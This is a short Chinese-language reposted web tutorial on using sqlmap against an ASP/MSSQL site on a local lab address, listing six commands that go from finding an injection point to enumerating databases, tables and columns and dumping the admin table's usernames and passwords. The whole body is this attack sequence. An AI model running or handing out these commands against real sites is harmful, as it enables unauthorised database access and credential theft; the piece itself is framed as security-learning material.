首页 网络安全 渗透测试 查看内容

实战黑客sqlmap渗透攻击mssql数据库最新教程

2020-3-18 18:11 |来自: 互联网 1927 0

摘要: 今天搭建了一个asp+mssql数据库的环境用于安全测试学习1.判断注入点及获取网站信息:sqlmap -u http://192.168.1.30/1/onews.asp?id=8web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 20052.获取所 ...
关键词: 192.168 sqlmap onews 数据库 asp http 1.30 sqlZR 字段 学习

今天搭建了一个asp+mssql数据库的环境用于安全测试学习

1.判断注入点及获取网站信息:

sqlmap -u http://192.168.1.30/1/onews.asp?id=8

web server operating system: Windows 2003 or XP

web application technology: ASP.NET, Microsoft IIS 6.0, ASP

back-end DBMS: Microsoft SQL Server 2005

2.获取所有数据库:

sqlmap -u http://192.168.1.30/1/onews.asp?id=8 --dbs


网站用的数据库是这个sqlZR

3.获取网站当前使用的数据库:

sqlmap -u http://192.168.1.30/1/onews.asp?id=8 --current-db

4.获取数据库中的表名:

sqlmap -u http://192.168.1.30/1/onews.asp?id=8 -D sqlZR --tables

5.获取数据表中的字段名:

sqlmap -u http://192.168.1.30/1/onews.asp?id=8 -D sqlZR -T Admin --columns

6.获取字段中的内容

sqlmap -u http://192.168.1.30/1/onews.asp?id=8 -D sqlZR -T admin -C "admin,password" --dump

看到了吧,几条命名就把管理员的账号密码给跑出来了。

学习网络安全技术的话,可以关注我,每天都会有相应的教程发布的,

咱们共同学习,进步

本文出处: https://www.toutiao.com/a6805076641253949959/
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部